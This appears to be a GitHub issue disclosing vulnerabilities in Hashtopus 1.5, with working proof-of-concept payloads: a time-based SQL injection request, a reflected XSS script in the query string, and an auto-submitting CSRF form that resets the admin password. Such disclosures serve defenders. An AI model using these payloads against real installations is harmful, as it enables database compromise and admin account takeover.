Skip to content

Hashtopus 1.5 Multiple Vulnerabilities #63

@ghost

Description

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

     $format=$_POST["format"];
[...]
          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)


Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:

[…]
name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 
[...]

Proof of concept:
/hashtopus/admin.php?"><script>alert(123);</script>

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
      <input type="hidden" name="password" value="0wn3d" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions